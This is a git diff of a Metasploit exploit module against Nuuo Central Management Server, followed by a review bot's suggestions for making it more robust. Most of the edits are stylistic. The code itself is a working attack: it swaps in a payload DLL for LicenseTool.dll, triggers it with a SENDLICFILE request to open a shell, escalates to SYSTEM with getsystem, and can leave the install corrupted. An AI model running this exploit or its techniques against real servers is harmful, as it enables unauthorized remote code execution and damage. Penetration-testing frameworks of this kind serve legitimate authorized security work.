parent
9070435603
commit
2b71410807
|
@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
This module will either use a provided session number (which can be guessed with an auxiliary
|
This module will either use a provided session number (which can be guessed with an auxiliary
|
||||||
module) or attempt to login using a provided username and password - it will also try the
|
module) or attempt to login using a provided username and password - it will also try the
|
||||||
default credentials if nothing is provided.
|
default credentials if nothing is provided.
|
||||||
|
|
||||||
|
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
|
||||||
|
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
|
||||||
|
not execute successfully.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
|
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DisclosureDate' => "Oct 11 2018",
|
'DisclosureDate' => 'Oct 11 2018',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_new_session(client)
|
def on_new_session(client)
|
||||||
if client.type == "meterpreter"
|
if client.type == 'meterpreter'
|
||||||
print_warning("Please wait a bit while we clean up")
|
print_warning('Please wait a bit while we clean up')
|
||||||
client.sys.process.get_processes().each do |proc|
|
client.sys.process.get_processes().each do |proc|
|
||||||
if proc['name'] == "NCS_Server.exe"
|
if proc['name'] == 'NCS_Server.exe'
|
||||||
client.sys.process.kill(proc['pid'])
|
client.sys.process.kill(proc['pid'])
|
||||||
sleep 5
|
Rex.sleep(5)
|
||||||
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
||||||
client.sys.process.execute("NCS_Server.exe")
|
client.sys.process.execute('NCS_Server.exe')
|
||||||
print_good("Successfully restored LicenseTool.dll!")
|
print_good('Successfully restored LicenseTool.dll!')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||||
client.run_cmd("getsystem")
|
client.run_cmd('getsystem')
|
||||||
print_good("We should have SYSTEM now, enjoy your shell!")
|
print_good('We should have SYSTEM now, enjoy your shell!')
|
||||||
else
|
else
|
||||||
print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
|
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
|
||||||
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
||||||
print_error("... otherwise the Nuuo CMS installation will be nuked!")
|
print_error('... otherwise the Nuuo CMS installation will be nuked!')
|
||||||
print_good("Anyway, enjoy your shell!")
|
print_good('Anyway, enjoy your shell!')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
nucs_login
|
nucs_login
|
||||||
|
|
||||||
if @nucs_session == nil
|
unless @nucs_session
|
||||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
|
||||||
end
|
end
|
||||||
|
|
||||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||||
# and not nuke the CMS installation.
|
# and not nuke the CMS installation.
|
||||||
@dll = rand_text_alpha(12)
|
@dll = rand_text_alpha(12)
|
||||||
print_status("Backing up LicenseTool.dll to #{@dll}")
|
print_status("Backing up LicenseTool.dll to #{@dll}")
|
||||||
dll_data = nucs_download_file("LicenseTool.dll")
|
dll_data = nucs_download_file('LicenseTool.dll')
|
||||||
nucs_upload_file(@dll, dll_data)
|
nucs_upload_file(@dll, dll_data)
|
||||||
|
|
||||||
print_status("Uploading payload...")
|
print_status('Uploading payload...')
|
||||||
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
|
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
|
||||||
|
|
||||||
print_status("Sleeping 15 seconds...")
|
print_status('Sleeping 15 seconds...')
|
||||||
sleep 15
|
Rex.sleep(15)
|
||||||
|
|
||||||
print_status("Sending SENDLICFILE request, shell incoming!")
|
print_status('Sending SENDLICFILE request, shell incoming!')
|
||||||
license_data = rand_text_alpha(50..350)
|
license_data = rand_text_alpha(50..350)
|
||||||
nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||||
"Content-Length: " + license_data.length.to_s], license_data)
|
'Content-Length: ' + license_data.length.to_s], license_data)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
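Review bot: The backup taken in `exploit` is never verified before LicenseTool.dll is overwritten: `dll_data = nucs_download_file('LicenseTool.dll')` flows straight into `nucs_upload_file(@dll, dll_data)` and then into the payload upload, so a nil or empty download leaves nothing to restore from, which is exactly the corruption case the module description warns about. Add `fail_with(Failure::Unknown, 'Could not back up LicenseTool.dll, aborting') if dll_data.nil? || dll_data.empty?` directly after the download, before the backup is uploaded. The same unconditional optimism appears in `on_new_session`, where `print_good('Successfully restored LicenseTool.dll!')` is printed without inspecting the result of the `move /y` command; capturing the return value of `client.shell_command_token` and emitting `print_warning` when it does not indicate success would make the cleanup status trustworthy. The fixed `Rex.sleep(5)` after the kill is presumably enough for the process to release the file, but a bounded poll of `get_processes` until `NCS_Server.exe` is gone would be more robust than a constant delay.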
|
|